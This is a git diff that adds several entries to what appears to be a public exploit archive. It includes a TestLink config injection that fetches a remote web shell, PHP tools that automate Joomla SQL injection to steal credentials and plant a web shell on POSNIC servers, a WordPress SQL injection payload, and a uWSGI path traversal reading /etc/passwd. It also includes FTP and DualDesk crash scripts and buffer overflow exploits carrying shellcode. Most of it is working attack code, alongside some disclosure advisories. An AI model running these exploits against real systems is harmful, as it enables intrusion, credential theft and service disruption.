diff --git a/exploits/hardware/webapps/44219.txt b/exploits/hardware/webapps/44219.txt new file mode 100644 index 000000000..31d2edca0 --- /dev/null +++ b/exploits/hardware/webapps/44219.txt @@ -0,0 +1,22 @@ +######################################################################## +# Exploit Title: D-Link DIR-600M Wireless - Persistent Cross Site Scripting +# Date: 11.02.2018 +# Vendor Homepage: http://www.dlink.co.in +# Hardware Link: http://www.dlink.co.in/products/?pid=DIR-600M +# Category: Hardware +# Exploit Author: Prasenjit Kanti Paul +# Web: http://hack2rule.wordpress.com/ +# Hardware Version: C1 +# Firmware version: 3.01 +# Tested on: Linux Mint +# CVE: CVE-2018-6936 +########################################################################## + +Reproduction Steps: + + - Goto your wifi router gateway [i.e: http://192.168.0.1] + - Go to --> "Maintainence" --> "Admin" + - Create a user with name "" + - Refresh the page and you will be having "PKP" popup + +Note: It can also be done by changing SSID name to "" \ No newline at end of file diff --git a/exploits/php/remote/44226.txt b/exploits/php/remote/44226.txt new file mode 100644 index 000000000..5dbfe5a85 --- /dev/null +++ b/exploits/php/remote/44226.txt @@ -0,0 +1,68 @@ +# Title: TestLink Open Source Test Management(<= 1.9.16) Remote Code Execution By Manish (error1046) +Vendor Home Page: http://testlink.org + +Disovered At: Indishell Lab + +CVE ID: CVE-2018-7466 + +/////////// +//OverView +/////////// + +Testlink (Version Below 1.9.17) is vulnerable to Remote Code Execution. +Vulnerable code is in file "install/installNewDB.php". Testlink allows user to re-install it and when user visits "/install/" directory and reachs to "Database detail" page i.e "install/installNewDB.php", user can specifiy PHP code in "TestLink DB login" field. +After successful installation, PHP code will get save in config file. + + +Exploitation + +During installation process, script first try to connect MySQL "root" user account (supplied by user during installation phase), if script is able to connect to MySQL server (locally or remotly hosted), process of CMS installation goes further. + +Script save MySQL server host, username and password in config file. + +Here attacker can take advantage of this process to write PHP code in config file. + +To do this, attacker need to setup MySQL server on a machine and MySQL server must be configure to accept connection from remote IP (which can be done easily by changing parameter in my.cnf file). + +To configure MySQL server open to remote connection, just open my.cnf file and do below mentioned steps + + -> comment out skip-networking as well as bind-address (if any present in my.cnf )i.e change line + + skip-networking + to + # skip-networking + + and + + bind-address = some_ip + to + #bind-address = some_ip + + save the my.cnf file. reload/restart MySQL server and your mysql server will accept remote connection from any remote IP + + Now, you need to configure MySQL root user in such way so that when remote script try to connect to MySQL server root user, it allows remote script. + + When attacker provide credentials of a Remote MySQL server which is attacker controlled and listening for remote connection, attacker just need to specify the remote MySQL server IP, root users username, password and need to specify below mentioned PHP code in "TestLink DB login" field (or in HTTP POST parameter tl_loginname). + + "box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" + + Once script establish successful connection to root user account of remote MySQL server, it will create MySQL user with name +"box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" and will write this username name in config_db.inc.php file. After that attacker just need to need to access the config file config_db.inc.php with following GET hethod HTTP parameters + + http://testlink/config_db.inc.php?1=ica.php&2=http://remote_server/php_web_shell.txt + +It will dump PHP web shell in base directory with name ica.php. + +![POC](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/master/TestLink%20-below%201.9.17-%20Remote%20Code%20Execution/testlink%20POC.png) + +--==[[ Greetz To ]]==-- + + Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, + Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, + Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256 + Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash + +--==[[Love to]]==-- + + My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP + Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik) \ No newline at end of file diff --git a/exploits/php/remote/44227.php b/exploits/php/remote/44227.php new file mode 100644 index 000000000..107a46985 --- /dev/null +++ b/exploits/php/remote/44227.php @@ -0,0 +1,276 @@ + + + + +--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==-- + + + +'; + echo $head ; + echo ' + + +
+ --==[[ Mannu ]]==--
--==[[ Joomla SQL Injection exploiter By Team INDIShEll]]==--
+
+ + ####################################################################################################################################
+ -==[[Greetz to]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, +
Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, +Hackuin,Alicks,mike waals
cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256 +Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
+--==[[Love to]]==--
My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP +Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
+--==[[Interface Desgined By]]==--
GCE College ke DON :D
+ + + #################################################################################################################################### + +
+ +'; + + +function unhex($hex){ + for($i=0;$i + +
+ +--==[[ code for India ]]==-- + +

+
+ + +
+ +'.$table_name; +echo '
'; + +$prefix=explode('_',$table_name); +$total_char=10; +$start=1; +$loop_end=false; + + +while($loop_end!=true) + { + + + + $payload2='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(password,'.$start.','.$total_char.'),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1'; + $final_url=$inject.$payload2; + + $data_extracted=data($final_url); + $de0=explode("~~~", $data_extracted); + $de1=explode("~~~", $de0[1]); + $ddd.=trim($de1[0]); + if(trim($de1[0])=='') + { + break; + $loop_end=true; + + } + $i=$i+1; + $start=$start+10; + + } + + + $username='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(username,1,20),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1'; + $final_url=$inject.$username; + $data_extracted=data($final_url); + $de0=explode("~~~", $data_extracted); + $de1=explode("~~~", $de0[1]); + $user_name=trim($de1[0]); + + $email='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(email,1,20),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1'; + $final_url=$inject.$email; + $data_extracted=data($final_url); + $de0=explode("~~~", $data_extracted); + $de1=explode("~~~", $de0[1]); + $email=trim($de1[0]); + + $dbuser='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(user(),1,20),0x7e7e7e))))=1'; + $final_url=$inject.$dbuser; + $data_extracted=data($final_url); + $de0=explode("~~~", $data_extracted); + $de1=explode("~~~", $de0[1]); + $db_user=trim($de1[0]); + + $dbname='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(database(),1,20),0x7e7e7e))))=1'; + $final_url=$inject.$dbname; + $data_extracted=data($final_url); + $de0=explode("~~~", $data_extracted); + $de1=explode("~~~", $de0[1]); + $db_name=trim($de1[0]); + + $dbversion='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(version(),1,20),0x7e7e7e))))=1'; + $final_url=$inject.$dbversion; + $data_extracted=data($final_url); + $de0=explode("~~~", $data_extracted); + $de1=explode("~~~", $de0[1]); + $db_version=trim($de1[0]); + + + if($email!='' || $user_name!='' || $ddd!='') + { + echo 'Target '.$target.' has been injected successfully, find username, email and password given below

'; + + echo ''; + echo ''; + echo ''; + echo ''; + echo ''; + echo ''; + echo '
Database username is -> '.$db_user; + echo '
Database name is -> '.$db_name; + echo '
Database version is -> '.$db_version; + echo '
Username is -> '.$user_name; + echo '
Email is -> '.$email; + echo '
Password hash is -> '.$ddd; + echo '
'; + } + + + +} + + + +?> \ No newline at end of file diff --git a/exploits/php/remote/44228.php b/exploits/php/remote/44228.php new file mode 100644 index 000000000..6936e4866 --- /dev/null +++ b/exploits/php/remote/44228.php @@ -0,0 +1,242 @@ + + + + +--==[[IndiSh3LL]]==-- + + + +'; + + + + echo $head ; + echo ' + + + + + +
+ --==[[ POSNIC, PHP stock management script Remote code execution exploiter ]==--
--==[[ With Love from Team Indishell]]==--
+ +
+ + ####################################################################################################################################
+ --==[[Greetz to]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,ethicalnoob Indishell,Local root indishell,Irfninja indishell
Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Gujjar PCP,Bikash,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA
cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL
+--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP, +Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
+--==[[Interface Desgined By]]==--
GCE College ke DON :D
+ + + #################################################################################################################################### + +
+ + +'; + +echo '
+ --==[[ code for India,Hack for India,Die for India ]]==-- +
Please Read it before using this code.

+
+ target URL: - +

Attacker controled Remote MySQL host: - +

Attacker controled Remote MySQL account username: - +

+ +
'; + + + +function request($lu,$payload) + { + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $lu); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); + curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); + curl_setopt ($ch, CURLOPT_POST, 1); + curl_setopt ($ch, CURLOPT_POSTFIELDS, "$payload"); + curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_exec ($ch); + curl_close ($ch); + } + +function shell_check($url) { + $curl = curl_init($url); + curl_setopt($curl, CURLOPT_NOBODY, true); + $result = curl_exec($curl); + $ret = false; + if ($result !== false) { + $statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE); + if ($statusCode == 200) { + $ret = true; + } + } + curl_close($curl); + return $ret; + } + + +function access($lu) +{ + $ch = curl_init(); + +curl_setopt($ch, CURLOPT_URL, $lu); +curl_setopt($ch, CURLOPT_HEADER, 0); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); +curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); +curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); +$result['EXE'] = curl_exec($ch); +curl_close($ch); +return $result['EXE']; + +} + + +if(isset($_POST['launch'])) +{ + + $tar=$_POST['tar']; + $mhost=trim($_POST['mhost']); + $muser=trim($_POST['muser']); + + + $injecturl=$tar.'/setup_page.php'; + $exploiturl=$tar.'/config.php'; + + + +///////////////////////////////////// +//here, we are injecting config file +///////////////////////////////////// + $hex_it="select[]=1&select_box=owned&host=$mhost&username=$muser&password=\";file_put_contents(\$_POST[2],\$_POST[3]);//&dummy=1&submit=INSTALL"; + request($injecturl,$hex_it); + +///////////////////////////////////////// +///Her we go, let's dump shell on server +//////////////////////////////////////// + $code=''; + $post_request='2=mannu.php&3='.$code; + request($exploiturl,$post_request); + access($tar.'/mannu.php'); + $shell_link=shell_check($tar.'/ica.php'); + if($shell_link==True) + { + echo 'check your shell at This link '; + } + +} + + +?> \ No newline at end of file diff --git a/exploits/php/remote/44229.txt b/exploits/php/remote/44229.txt new file mode 100644 index 000000000..753e34a3c --- /dev/null +++ b/exploits/php/remote/44229.txt @@ -0,0 +1,38 @@ +Exploit Title :WordPress Polls plugin(1.2.4) SQL Injection vulnerability +
+Vulnerable version:<=1.2.4 +
Download Link : https://downloads.wordpress.org/plugin/polls-widget.1.2.4.zip + +//////////////////////// +
/// Overview: +
//////////////////////// +
+
WordPress Polls plugin is a tool for creating polls and survey forms. You can use polls on widgets, posts and pages. Plugin code accept answer from user using survey form. During this process, HTTP POST parameter "question_id" goes to SQL query without data senitization which arise SQL Injection vulnerability. Vulnerable code is in "fornt_end/fornt_end.php" file. + + +//////////////// +
+/// POC //// +
+/////////////// +
+ SQL Injection payload to enumerate tables +
---------------------------------------------- +
http://ica.lab/wp-admin/admin-ajax.php?action=pollinsertvalues +
Post data +
question_id=-3 union select concat(0x3c62723e3c666f6e7420636f6c6f723d626c61636b2073697a653d343e3c623e2d2d3d3d5b5b20496e64695368656c6c204c61625d5d3d3d2d2d203c62723e4461746162617365204e616d653a202d ,database(),0x3c62723e,0x446174616261736520557365723a202d20,user(),0x3c62723e,group_concat(0x3c62723e,table_name,0x7e,column_name),0x3c62723e,0x3c62723e3c62723e3c62723e),2 from information_schema.columns where table_schema=database()--&poll_answer_securety=0c7d4ce561&date_answers[0]=5 + + +POC
+ +
+ + --==[[ Greetz To ]]==-- +Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, +
Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, +
Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256 +
Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash +
+ --==[[ Love To ]]==-- +
My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, +
Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik) \ No newline at end of file diff --git a/exploits/php/webapps/44223.txt b/exploits/php/webapps/44223.txt new file mode 100644 index 000000000..dbd082884 --- /dev/null +++ b/exploits/php/webapps/44223.txt @@ -0,0 +1,76 @@ +# Exploit Title: uWSGI PHP Plugin Directory Traversal +# Date: 01-03-2018 +# Exploit Author: Marios Nicolaides - RUNESEC +# Reviewers: Simon Loizides and Nicolas Markitanis - RUNESEC +# Vendor Homepage: https://uwsgi-docs.readthedocs.io +# Affected Software: uWSGI PHP Plugin before 2.0.17 +# Tested on: uWSGI 2.0.12 and 2.0.15 +# CVE: CVE-2018-7490 +# Category: Web Application + + +OVERVIEW +-------- +The uWSGI PHP plugin before 2.0.17 is vulnerable to Directory Traversal when used without specifying the "php-allowed-docroot" option. + +The vulnerability exists due to improper validation of the file path when requesting a resource under the DOCUMENT_ROOT directory which is specified via "php-docroot". + +A remote attacker could exploit this weakness to read arbitrary files from the vulnerable system using path traversal sequences ("..%2f"). + +This was tested on uWSGI 2.0.12 and 2.0.15. All versions before 2.0.17 are affected. + + +DETAILS +------- +The documentation of uWSGI states that the php-docroot option is used to jail our php environment to a project directory (http://uwsgi-docs.readthedocs.io/en/latest/PHP.html#run-php-apps-without-a-frontend-server). + + ; jail our php environment to project_dir + php-docroot = %(project_dir) + +During testing it was observed that uWSGI was affected by a Directory Traversal vulnerability when executed as a standalone (without a front-end web server) along with the "php-docroot" option to enforce the DOCUMENT_ROOT of the web application. + + uwsgi --http-socket :1337 --protocol=http --plugin php --php-index index.php --php-docroot /home/testing/webapp/ + +An attacker could exploit this vulnerability by using path traversal sequences ("..%2f") to access sensitive information as demonstrated below: + + http://example.runesec.com:1337/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd + +We noticed that when a Directory Traversal attack was performed, uWSGI was issuing the following security error: + + [uwsgi-fileserve] security error: /etc/passwd is not under /home/testing/webapp or a safe path + +However, the contents of the requested file (i.e., /etc/passwd) were still returned to the user. + +After searching the web for possible solutions, we noticed that the "php-allowed-docroot" option was previously added to uWSGI for better security and could be used to list the allowed document roots but no further details were available (http://lists.unbit.it/pipermail/uwsgi/2011-December/003180.html). + +Upon further testing, we observed that when the "php-allowed-docroot" was used instead of the "php-docroot" option, it was not affected by Directory Traversal attacks. + + uwsgi --http-socket :1337 --protocol=http --plugin php --php-index index.php --php-allowed-docroot /home/testing/webapp/ + +After a very constructive and helpful talk with the uWSGI Project, they released an update which enforces a DOCUMENT_ROOT check when using the "php-docroot" option to prevent Directory Traversal attacks. Please see the MITIGATION section for more information. + + +IMPACT +------ +An attacker could exploit this vulnerability to gain unauthorized read access to sensitive files located outside of the web root directory. + + +MITIGATION +---------- +It is recommended to update to uWSGI 2.0.17 - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html + + +REFERENCES +---------- +https://blog.runesec.com/2018/03/01/uwsgi-path-traversal/ +https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7490 +https://nvd.nist.gov/vuln/detail/CVE-2018-7490 +https://www.owasp.org/index.php/Testing_Directory_traversal/file_include_(OTG-AUTHZ-001) + + +TIMELINE +-------- +26 June 2017 - uWSGI Project informed about the issue +26 February 2018 - uWSGI Project released a patch +1 March 2018 - Exploit publicly disclosed \ No newline at end of file diff --git a/exploits/windows/dos/42341.c b/exploits/windows/dos/42341.c index c3cdac3b2..a3eab1ea1 100644 --- a/exploits/windows/dos/42341.c +++ b/exploits/windows/dos/42341.c @@ -1,3 +1,8 @@ +/* +Sync Breeze Enterprise BOF - Ivan Ivanovic Ivanov Иван-дурак +недействительный 31337 Team +*/ + #define _WINSOCK_DEPRECATED_NO_WARNINGS #define DEFAULT_BUFLEN 512 diff --git a/exploits/windows/dos/44221.py b/exploits/windows/dos/44221.py new file mode 100755 index 000000000..398082287 --- /dev/null +++ b/exploits/windows/dos/44221.py @@ -0,0 +1,105 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SEGGER-embOS-FTP-SERVER-v3.22-FTP-COMMANDS-DENIAL-OF-SERVICE.txt +[+] ISR: Apparition Security + + + +Vendor: +============= +www.segger.com + + +Product: +=========== +embOS/IP FTP Server v3.22 + + +Vulnerability Type: +=================== +FTP Commands Denial Of Service + + + +CVE Reference: +============== +CVE-2018-7449 + + +Security Issue: +================ +SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial of service (daemon crash) +via an invalid LIST, STOR, or RETR command. + +STOR 666\r\n +LIST\r\n +RETR '+'..\\'*8+'Windows\system.ini\r\n + + +TELNET x.x.x.x 21 + +220 Welcome to embOS/IP FTP server +USER anonymous +331 Password required. +PASS anonymous +230 User logged in, proceed. +STOR Bye! + +CRASH!!! + + + +Exploit/POC: +============= +import socket,time + +VICTIM=raw_input('[+]Segger v3.22 FTP Server IP > ') +USR='anonymous' +PWD='anonymous' +CMD="STOR Bye!\r\n" + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((VICTIM, 21)) +print s.recv(1024) # Recieve FTP Banner +time.sleep(1) +s.send("USER " + USR+ "\r\n") +print s.recv(1024) +time.sleep(1) +s.send("PASS "+ PWD+"\r\n") # +print s.recv(1024) +time.sleep(1) +s.send(CMD) +print 'Sent %s' % CMD +s.close() + + + + +Network Access: +=============== +Remote + + + +Severity: +========= +Medium + + + +Disclosure Timeline: +============================= +Vendor Notification: February 17, 2018 +Vendor acknowledgement: February 19, 2018 +Vendor released fixed version v3.22a : February 23, 2018 +March 1, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). \ No newline at end of file diff --git a/exploits/windows/dos/44222.txt b/exploits/windows/dos/44222.txt new file mode 100644 index 000000000..09322e1b8 --- /dev/null +++ b/exploits/windows/dos/44222.txt @@ -0,0 +1,85 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/DUALDESK-v20-DENIAL-OF-SERVICE.txt +[+] ISR: Apparition Security + + +Vendor: +=============== +www.dualdesk.com + + + +Product: +=========== +DualDesk v20 + +DualDesk is powerful, easy to use remote support software that is a one-time purchase and lets your +technical support staff remote assist a PC anywhere on the internet through firewalls in seconds with no +configuration. + + + +Vulnerability Type: +=================== +Denial Of Service + + + +CVE Reference: +============== +CVE-2018-7583 + + +Security Issue: +================ +Remote unauthenticated attackers can crash the "Proxy.exe" Server component of Dualdesk application +which listens on TCP Port 5500 by sending a long string of junk chars. + +(d24.d60): Security check failure or stack buffer overrun - code c0000409 (first/second chance not available) +eax=00000000 ebx=0257f1c0 ecx=00000000 edx=00000000 esi=00000002 edi=00000000 +eip=77c6016d esp=0257f170 ebp=0257f20c iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 +ntdll!NtWaitForMultipleObjects+0x15: +77c6016d 83c404 add esp,4 + + +Exploit/POC: +============= +Start the Dualdesk Run Proxy as Application. + +C:\>python -c "print 'a'*8000" > crash.txt + +C:\>type crash.txt | nc.exe localhost 5500 + +Crash!!! + + +Network Access: +=============== +Remote + + + +Severity: +========= +Medium + + + +Disclosure Timeline: +============================= +Vendor Notification: February 4, 2018 +Second attempt : February 17, 2018 +Request CVE, assigned by Mitre : March 1, 2018 +March 1, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). \ No newline at end of file diff --git a/exploits/windows/local/38457.c b/exploits/windows/local/38457.c new file mode 100644 index 000000000..cd4b9edf1 --- /dev/null +++ b/exploits/windows/local/38457.c @@ -0,0 +1,65 @@ +/* +ASX to MP3 Converter SOF - Ivan Ivanovic Ivanov Иван-дурак +недействительный 31337 Team +holahola ~ https://www.exploit-db.com/exploits/38382/ +Winblows 2k3 +*/ + +#include +#include +#include + +int main() { + + int i; + char *overwrite_offset = malloc(255); + for(i = 0; i < 255; i += 5) { + char padding[] = "\x41\x41\x41\x41\x41"; + memcpy(overwrite_offset + i, padding, strlen(padding)); + } + memset(overwrite_offset + _msize(overwrite_offset) - 1, 0x00, 1); + + char retn[] = "\x92\x72\x23\x74"; + char shellcode[] = + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP sled + "\xdb\xc8\xd9\x74\x24\xf4\xbd\xaf\x93\x43\xb4\x5e\x31\xc9\xb1" + "\x52\x31\x6e\x17\x83\xee\xfc\x03\xc1\x80\xa1\x41\xe1\x4f\xa7" + "\xaa\x19\x90\xc8\x23\xfc\xa1\xc8\x50\x75\x91\xf8\x13\xdb\x1e" + "\x72\x71\xcf\x95\xf6\x5e\xe0\x1e\xbc\xb8\xcf\x9f\xed\xf9\x4e" + "\x1c\xec\x2d\xb0\x1d\x3f\x20\xb1\x5a\x22\xc9\xe3\x33\x28\x7c" + "\x13\x37\x64\xbd\x98\x0b\x68\xc5\x7d\xdb\x8b\xe4\xd0\x57\xd2" + "\x26\xd3\xb4\x6e\x6f\xcb\xd9\x4b\x39\x60\x29\x27\xb8\xa0\x63" + "\xc8\x17\x8d\x4b\x3b\x69\xca\x6c\xa4\x1c\x22\x8f\x59\x27\xf1" + "\xed\x85\xa2\xe1\x56\x4d\x14\xcd\x67\x82\xc3\x86\x64\x6f\x87" + "\xc0\x68\x6e\x44\x7b\x94\xfb\x6b\xab\x1c\xbf\x4f\x6f\x44\x1b" + "\xf1\x36\x20\xca\x0e\x28\x8b\xb3\xaa\x23\x26\xa7\xc6\x6e\x2f" + "\x04\xeb\x90\xaf\x02\x7c\xe3\x9d\x8d\xd6\x6b\xae\x46\xf1\x6c" + "\xd1\x7c\x45\xe2\x2c\x7f\xb6\x2b\xeb\x2b\xe6\x43\xda\x53\x6d" + "\x93\xe3\x81\x22\xc3\x4b\x7a\x83\xb3\x2b\x2a\x6b\xd9\xa3\x15" + "\x8b\xe2\x69\x3e\x26\x19\xfa\xed\xa7\x55\x71\x85\xc5\x95\x84" + "\xed\x43\x73\xec\x01\x02\x2c\x99\xb8\x0f\xa6\x38\x44\x9a\xc3" + "\x7b\xce\x29\x34\x35\x27\x47\x26\xa2\xc7\x12\x14\x65\xd7\x88" + "\x30\xe9\x4a\x57\xc0\x64\x77\xc0\x97\x21\x49\x19\x7d\xdc\xf0" + "\xb3\x63\x1d\x64\xfb\x27\xfa\x55\x02\xa6\x8f\xe2\x20\xb8\x49" + "\xea\x6c\xec\x05\xbd\x3a\x5a\xe0\x17\x8d\x34\xba\xc4\x47\xd0" + "\x3b\x27\x58\xa6\x43\x62\x2e\x46\xf5\xdb\x77\x79\x3a\x8c\x7f" + "\x02\x26\x2c\x7f\xd9\xe2\x5c\xca\x43\x42\xf5\x93\x16\xd6\x98" + "\x23\xcd\x15\xa5\xa7\xe7\xe5\x52\xb7\x82\xe0\x1f\x7f\x7f\x99" + "\x30\xea\x7f\x0e\x30\x3f"; + + int buffer_size = _msize(overwrite_offset) + strlen(retn) + strlen(shellcode); + char *buffer = malloc(buffer_size); + + memcpy(buffer, overwrite_offset, _msize(overwrite_offset)); + memcpy(buffer + _msize(overwrite_offset), retn, strlen(retn)); + memcpy(buffer + _msize(overwrite_offset) + strlen(retn), shellcode, strlen(shellcode)); + memset(buffer + buffer_size - 1, 0x00, 1); + + FILE * fp; + fp = fopen("exploit.asx","w"); + fprintf(fp, buffer); + fclose(fp); + + return 0; + +} \ No newline at end of file diff --git a/exploits/windows/local/44217.py b/exploits/windows/local/44217.py new file mode 100755 index 000000000..7bd7ec78b --- /dev/null +++ b/exploits/windows/local/44217.py @@ -0,0 +1,59 @@ +#!/usr/bin/python + +# +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Exploit Title: IrfanView 4.44 Email PlugIn - Local Buffer Overflow (SEH) +# Date: 02-07-2018 +# Vulnerable Software: IrfanView 4.44 Email PlugIn +# Vendor Homepage: http://www.irfanview.com/ +# Version: 4.44 +# Software Link: http://www.irfanview.info/files/irfanview_444.exe +# Software Link: http://www.irfanview.info/files/irfanview_plugins_444.zip +# Tested On: Windows XP SP3 x86 and Windows 7 SP1 x86 +# +# PoC +# 1. generate irfan.txt, copy contents to clipboard +# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg) +# 3. select Options, Send by Email, Settings +# 4. paste contents from clipboard into Full Name and select OK +# 5. application crashes +# 6. pop calc +# + +filename="irfan.txt" + +junk = "\x41"*1236 + +#jump 6 +nseh = "\xeb\x06\x90\x90" + +#0x10021420 : pop ebp # pop ebx # ret +seh = "\x20\x14\x02\x10" + +#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f c +#Payload size: 220 bytes +calc = ( +"\xda\xdf\xba\x32\x98\xc1\x8e\xd9\x74\x24\xf4\x58\x31\xc9\xb1" +"\x31\x83\xe8\xfc\x31\x50\x14\x03\x50\x26\x7a\x34\x72\xae\xf8" +"\xb7\x8b\x2e\x9d\x3e\x6e\x1f\x9d\x25\xfa\x0f\x2d\x2d\xae\xa3" +"\xc6\x63\x5b\x30\xaa\xab\x6c\xf1\x01\x8a\x43\x02\x39\xee\xc2" +"\x80\x40\x23\x25\xb9\x8a\x36\x24\xfe\xf7\xbb\x74\x57\x73\x69" +"\x69\xdc\xc9\xb2\x02\xae\xdc\xb2\xf7\x66\xde\x93\xa9\xfd\xb9" +"\x33\x4b\xd2\xb1\x7d\x53\x37\xff\x34\xe8\x83\x8b\xc6\x38\xda" +"\x74\x64\x05\xd3\x86\x74\x41\xd3\x78\x03\xbb\x20\x04\x14\x78" +"\x5b\xd2\x91\x9b\xfb\x91\x02\x40\xfa\x76\xd4\x03\xf0\x33\x92" +"\x4c\x14\xc5\x77\xe7\x20\x4e\x76\x28\xa1\x14\x5d\xec\xea\xcf" +"\xfc\xb5\x56\xa1\x01\xa5\x39\x1e\xa4\xad\xd7\x4b\xd5\xef\xbd" +"\x8a\x6b\x8a\xf3\x8d\x73\x95\xa3\xe5\x42\x1e\x2c\x71\x5b\xf5" +"\x09\x8d\x11\x54\x3b\x06\xfc\x0c\x7e\x4b\xff\xfa\xbc\x72\x7c" +"\x0f\x3c\x81\x9c\x7a\x39\xcd\x1a\x96\x33\x5e\xcf\x98\xe0\x5f" +"\xda\xfa\x67\xcc\x86\xd2\x02\x74\x2c\x2b") + +fill = "\x44"*1000 + +buffer = junk + nseh + seh + calc + fill + +textfile = open(filename , 'w') +textfile.write(buffer) 